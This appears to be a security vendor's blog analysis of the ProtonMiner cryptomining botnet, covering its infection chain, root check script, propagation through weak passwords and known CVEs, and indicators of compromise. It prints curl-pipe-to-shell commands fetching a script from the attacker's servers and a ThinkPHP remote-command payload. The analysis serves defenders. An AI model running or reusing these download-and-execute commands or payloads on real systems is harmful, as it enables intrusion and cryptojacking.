ProtonMiner Gains Momentum via Expanded Attack Surface

Security is sometimes a very simple business: if you rely on weak passwords and use root access, there is a high chance that someone will develop a malware to hack your database or web service.

This blog post provides a recent example for this truth: ProtonMiner, a new cryptocurrency miner hijacker discovered by Alibaba Cloud security team, which became extremely active since mid-February 2019. The post provides a clear analysis of the malware — how it infects, how it propagates to additional victims, its impact, and its recent distribution trend; the post also offers security recommendations to avoid it.

Yohai Einav, Principal Security Researcher, Alibaba Cloud Security Innovation Labs

Background

Security researchers at Alibaba Cloud have recently detected an outburst of a new cryptocurrency miner hijacker, which they named “ProtonMiner”. This miner was very likely created by the same attacker’s group mentioned by TrendMicro in their December 2018 blog post. The botnet initially propagated slowly using several old vulnerabilities in ElasticSearch, yet, since mid-February we saw its popularity grow considerably as it expanded its attack surface.

This blog post provides details on how the botnet propagates itself, as well as our security recommendations for end users to avoid being infected.

Infection Outline

Image for post
Image for post

Step 1: The attacker controls the compromised hosts and runs one of following commands to download uuu.sh (or update.sh, which has identical content):

/bin/bash -c curl -fsSL http://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh |sh
/bin/bash -c curl -fsSL http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/uuu.sh |sh

Step 2: The uuu.sh (or update.sh) script downloads three files: a trojan, a miner and a mining configuration file. The miner will mine cryptocurrency on the compromised host, while the trojan will continue to distribute to other uncompromised hosts.

Shell Script from a Stealthy Attacker

The uuu.sh script firstly tries to update /etc/devtools, and test whether the current account has root privilege. Only when it is root the main part of script would execute and mining would start.

#!/bin/sh
echo 1 > /etc/devtools
if [ -f "$rtdir" ]
then
echo "i am root"
echo "goto 1" >> /etc/devtools
\# download & attack
fi

Other parts of script consist of typical mining botnet behavior: it first detects and kills process of other mining groups, adds itself to crontab, and alters iptables configuration to allow communication on certain ports. However, the attacker seems to be more cautious than other malicious script authors in following aspects:

  1. The attacker cleans up command history after itself:

The attacker uses many different ProtonMail addresses as username in the mining configuration file. ProtonMail is the world’s largest secure email service, and we named the botnet ProtonMiner after it. By using secure email addresses instead of Monero wallet address as mining username, the attacker adds difficulty for security researchers to detect the threat, as well as to investigate the mining profits and the scale of compromised hosts from the botnet.

Image for post
Image for post

Propagation Method Analysis

The propagation module of ProtonMiner is named “systemctI” and is written in Go language. Its main function is as following:

Image for post

The trojan first initializes the ip list and weak password list to start the scanning. The initialization is done by requesting and downloading the lists from the following URLs:
https://pixeldra.in/api/download/I9RRye (IP address CIDR blocks)
https://pixeldra.in/api/download/-7A5aP (weak passwords)

Image for post
Image for post
Image for post
Image for post

After that, it enters the mainScan() function, which contains multiple sub-functions to scan and exploit services.

Image for post
Image for post

This is the list of impacted services and corresponding vulnerabilities:

ServiceVulnerabilityHadoopUnauthorized accessDrupalCVE-2018–7600RedisUnauthorized accessSpring Data CommonsCVE-2018–1273SQL ServerWeak passwordElastic SearchCVE-2014–3120
CVE-2015–1427WeblogicCVE-2017–10271ThinkPHPTwo RCEs(Remote Command Execution) including CVE-2018–20062

For example, here it is a ThinkPHP payload (the infected host name is masked for privacy issue):

POST /index.php?s=captcha HTTP/1.1%0d%0aHost: 47.244.[xxx].xxx=system&method=get&server[REQUEST_METHOD]=url -fsSLhttp://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh |sh

Distribution Trend

After extending its attack surface, ProtonMiner’s distribution gained momentum, and reached a peak of about one thousand plus infections around mid-February of this year.

Image for post
Image for post

Figure 1: Daily distribution of devices infected by ProtonMiner

Security Recommendations

  1. We strongly advise you to NOT run database and web services with root account. Furthermore, services like Redis and Hadoop should not be exposed to public network.
  2. Mining botnets are very quick in updating themselves to contain new vulnerability payloads, and they create ubiquitous threats on the Internet. Alibaba’s Cloud Firewall is able to detect, block and protect from these kinds of threats.
  3. If you are concerned about your servers’ security, but do not have a security engineer to tell you what to do, you should give Alibaba’s Cloud Managed Security Service a try. Alibaba Cloud’s Security experts will help you clean up malware, improve configurations, and enhance overall security.

IOC

C&C servers:
45.76.122.92
207.148.70.143

Files:

Filenamemd5update.shce10c8da626e5c24eab3e2f7e496cb57 (same as uuu.sh)config.json26baedfa378af63a2a566a7f672d5276systemctI359e7272c933c710476955508d687ad3devtool5e6b6fcd7913ae4917b0cdb0f09bf539

Pool address:
xmr.pool.minergate.com:45700

Usernames at pool:
xjkhjjkasd@protonmail.com
dashcoin230cdd@protonmail.com
alksjewio@protonmail.com
23odi093dd@protonmail.com
olpeplckdd3@protonmail.com

Reference

Reference:https://www.alibabacloud.com/blog/protonminer-gains-momentum-via-expanded-attack-surface_594535?spm=a2c41.12636409.0.0

Written by

Follow me to keep abreast with the latest technology news, industry insights, and developer trends.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store